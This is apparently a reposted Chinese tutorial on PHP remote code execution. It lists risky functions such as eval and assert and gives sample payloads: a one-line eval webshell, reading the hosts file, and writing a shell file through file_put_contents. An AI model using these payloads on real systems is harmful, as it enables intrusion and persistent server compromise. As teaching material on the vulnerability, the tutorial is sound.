命令执行——远程命令执行(二)
生活随笔
收集整理的這篇文章主要介紹了
命令执行——远程命令执行(二)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
普及遠程命令執行漏洞相關函數和利用
遠程命令執行漏洞相關函數
在PHP下,允許命令執行的函數有:
>eval()
>assert()
>preg_replace()
>call user func()
>$a($b)
如果頁面中存在這些函數并且對于用戶的輸入沒有做嚴格的過濾,那么就可能造成遠程命令執行漏洞。
遠程命令執行漏洞的利用
遠程命令執行漏洞有以下一些利用方式:
>?a=@eval($_POST[666]);
一句話木馬
>?a=print(__FILE__);
獲取當前絕對路徑
>?a=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts'));
讀取文件
>?a=var_dump(file_put_contents($_POST[1],$_POST[2]));
1=shell.php&2=<?php phpinfo()?>
寫shell
總結
以上是生活随笔為你收集整理的命令执行——远程命令执行(二)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 命令执行——命令执行漏洞概述(一)
- 下一篇: 命令执行——系统命令执行(三)